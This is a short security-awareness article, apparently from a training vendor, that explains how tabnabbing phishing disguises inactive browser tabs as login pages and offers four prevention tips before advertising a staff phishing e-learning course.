What is tabnabbing? How it works and what you can do to prevent it

Tabnabbing is a type of phishing attack that manipulates inactive web pages. It’s a variation of a common trick in which spam pages open when you open a website, but with tabnabbing, if you don’t close the tab, it will change the page layout and tab title to mimic a legitimate site.

The scammers hope that users will return to the tab and mistake it for a page they opened themselves.  If the user enters their login credentials, they are inadvertently providing their information to scammers.

Learn about other kinds of social engineering >>

Unlike most phishing scams, tabnabbing doesn’t ask the user to click a link that sends them to the bogus site. Instead, the site appears as if from nowhere, and relies on users’ inattentiveness. This makes it very dangerous, because most people wouldn’t recognise it as a phishing attack and aren’t on alert to look for the tell-tale signs of such scams.

Examples of tabnabbing

You are most likely to fall victim to tabnabbing when you have several tabs open. This is standard practice for a lot of people – particularly at work, where you are often multitasking throughout the day.

When multiple tabs are open, it’s easy for pop-ups to appear without you noticing. You’ll probably assume that you opened the site yourself and simply forgot. Even if you weren’t intending to visit the site, simply seeing the tab open is enough of an incentive to log in.

Alternatively, you might mistake the malicious site for a page you already have open, and assume that you had been automatically logged out. Many sites do this as a security measure, and you’re probably used to providing your credentials at regular intervals throughout the day.

How to prevent tabnabbing

Here are four things you can do to prevent tabnabbing:

1. Have as few tabs open as possible. People often struggle with this, but it’s probably easier to open a new tab and enter the address than it is to look through dozens of open tabs to find the right one.

2. If you absolutely must have more than four or so tabs open, keep them in different windows according to what you use them for. So, for example, you might have one window with your inbox and intranet, one for your work tasks and another for non-work-related activities. This won’t make you less likely to be targeted by tabnabbing, but you are more likely to notice when a tab has been infected, because it will probably be in the wrong place.

3. Check the address bar. The site’s content might change, but the address won’t match it.

4. Take a close look at the page. There may well be differences between it and the genuine site. You should look for spelling mistakes, poor phrasing and unusual layouts.

Get your staff on the same page

As with all types of phishing, attacks can happen to anyone at any time. For organisations to ensure their systems aren’t infected, they need to train staff to identify and defend against attacks.

Our Phishing Staff Awareness E-learning Course will teach your staff everything they need to know about phishing, including what happens if they fall victim.

The course is delivered online, making it quick and convenient. Employees can study at a time and place that suits them, and senior staff can get a comprehensive overview of their workforce’s level of information security awareness.

Find out more >>